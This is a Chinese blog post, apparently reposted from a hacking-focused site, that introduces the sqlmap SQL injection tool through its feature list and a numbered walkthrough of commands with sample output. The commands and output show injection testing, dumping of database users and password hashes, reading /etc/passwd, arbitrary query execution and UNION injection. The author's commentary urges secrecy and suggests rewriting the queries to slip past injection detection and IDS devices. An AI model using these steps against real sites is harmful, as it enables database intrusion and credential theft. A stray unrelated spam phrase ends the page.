SQLmap工具介绍及其使用
http://sqlmap.sourceforge.net/
这是SEVEN大哥写的!:
从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。
就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。
结果发现了这个工具。
功能非常强大。
我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我还没有时间来得及分析。感兴趣的朋友可以去研究研究。
开源又功能强大的工具。
尽量不要外传。
支持现在几乎所有的数据库,比国内的任何工具都强。我都开始怀疑穿山甲是不是源自于它。
支持get,post ,cookie注入。可以添加cookie和user-agent
支持盲注,错误回显注入,还有其他多种注入方法。
支持代理,
优化算法,更高效。
指纹识别技术判断数据库
以下是说明。
Here is a list of major features implemented in sqlmap:
* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
* Extensive database management system back-end fingerprint based
upon:
o Inband DBMS error messages
o DBMS banner parsing
o DBMS functions output comparison
o DBMS specific features such as MySQL comment injection
o Passive SQL injection fuzzing
* It fully supports two SQL injection techniques:
o Blind SQL injection, also known as Inference SQL injection
o Inband SQL injection, also known as UNION query SQL
injection
and it partially supports error based SQL injection as one of
the vectors for database management system fingerprint;
* It automatically tests all provided GET, POST, Cookie and User-
Agent parameters to find dynamic ones. On these it automatically tests
and detects the ones affected by SQL injection. Moreover each dynamic
parameter is tested for numeric, single quoted string, double quoted
string and all of these three type with one and two brackets to find
which is the valid syntax to perform further injections with;
* It is possible to provide the name of the only parameter(s) that
you want to perform tests and use for injection on, being them GET,
POST, Cookie parameters;
* SQL injection testing and detection does not depend upon the web
application database management system back-end. SQL injection
exploiting and query syntax obviously depend upon the web application
database management system back-end;
* It recognizes valid queries by false ones based upon HTML output
page hashes comparison by default, but it is also possible to choose
to perform such test based upon string matching;
* HTTP requests can be performed in both HTTP method GET and POST
(default: GET);
* It is possible to perform HTTP requests using a HTTP User-Agent
header string randomly selected from a text file;
* It is possible to provide a HTTP Cookie header string, useful
when the web application requires authentication based upon cookies
and you have such data;
* It is possible to provide an anonymous HTTP proxy address and
port to pass by the HTTP requests to the target URL;
* It is possible to provide the remote DBMS back-end if you
already know it making sqlmap save some time to fingerprint it;
* It supports various command line options to get database
management system banner, current DBMS user, current DBMS database,
enumerate users, users password hashes, databases, tables, columns,
dump tables entries, dump the entire DBMS, retrieve an arbitrary file
content (if the remote DBMS is MySQL) and provide your own SQL SELECT
statement to be evaluated;
* It is possible to make sqlmap automatically detect if the
affected parameter is also affected by an UNION query SQL injection
and, in such case, to use it to exploit the vulnerability;
* It is possible to exclude system databases when enumerating
tables, useful when dumping the entire DBMS databases tables entries
and you want to skip the default DBMS data;
* It is possible to view the Estimated time of arrival for each
query output, updated in real time while performing the SQL injection
attack;
* Support to increase the verbosity level of output messages;
* It is possible to save queries performed and their retrieved
value in real time on an output text file and continue the injection
resuming from such file in a second time;
* PHP setting magic_quotes_gpc bypass by encoding every query
string, between single quotes, with CHAR (or similar) DBMS specific
function.
昨天晚上实在忍不住,还是看了一些,然后测试了一下。里面的sql语句太过于简单,不过你可以定制。修改为更富在的语句。以绕过注入检测和其他IDS设
备。
稍晚一下,我编译一个dos版本的给你们。
1、首先安装python2.5。
2、然后进入sqlmap的目录,执行sqlmap
详细用法
1、sqlmap -u 注入点
2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,可以直接修改为百度
3、
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4、指定参数注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
-p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v
1 -p "cat,id"
5、指定方法和post的数据
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
data "id=1&cat=2"
6、指定cookie,可以注入一些需要登录的地址
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie
"COOKIE_VALUE"
7、通过代理注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
"http://127.0.0.1:8118"
8、指定关键词,也可以不指定。程序会根据返回结果的hash自动判断
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
"STRING_ON_TRUE_PAGE"
9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。
--remote-dbms
10、指纹判别数据库类型
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
11、获取banner信息
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
12、获取当前数据库,当前用户,所有用户,密码,所有可用数据库。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
current-db
current database: 'testdb'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
passwords
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] testdb
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables
-D "information_schema"
Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS |
| COLUMN_PRIVILEGES |
| COLUMNS |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMA_PRIVILEGES |
| SCHEMATA |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --
columns -T "user" -D "mysql"
Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| Alter_priv | enum |
| Alter_routine_priv | enum |
| Create_priv | enum |
| Create_routine_priv | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv | enum |
| Create_view_priv | enum |
| Delete_priv | enum |
| Drop_priv | enum |
| Execute_priv | enum |
| File_priv | enum |
| Grant_priv | enum |
| Host | char |
| Index_priv | enum |
| Insert_priv | enum |
| Lock_tables_priv | enum |
| max_connections | int |
| max_questions | int |
| max_updates | int |
| max_user_connections | int |
| Password | char |
| Process_priv | enum |
| References_priv | enum |
| Reload_priv | enum |
| Repl_client_priv | enum |
| Repl_slave_priv | enum |
| Select_priv | enum |
| Show_db_priv | enum |
| Show_view_priv | enum |
| Shutdown_priv | enum |
| ssl_cipher | blob |
| ssl_type | enum |
| Super_priv | enum |
| Update_priv | enum |
| User | char |
| x509_issuer | blob |
| x509_subject | blob |
+-----------------------+------+
13、显示指定的文件内容,一般用于php
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /
etc/passwd
/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,,,:/var/lib/postgresql:/
bin/bash
inquis:x:1000:100:Bernardo Damele,,,:/home/inquis:/bin/bash
---
14、执行你自己的sql语句。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e
"SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"
[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM
mysql.user WHERE user = 'root' LIMIT 0, 1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user =
'root' LIMIT 0, 1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1:
'YYYYYYYYYYYYYYYY'
15、union注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-
check
valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT
NULL, NULL, NULL--&cat=2'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
union-use --banner
[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql
injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL
SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(),
CHAR(95,95,83,84,79,80,95,95)), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
16、保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -
o "sqlmap.log"
[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --
banner -o "sqlmap.log" --resume
[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3738.html
tory burch matelasse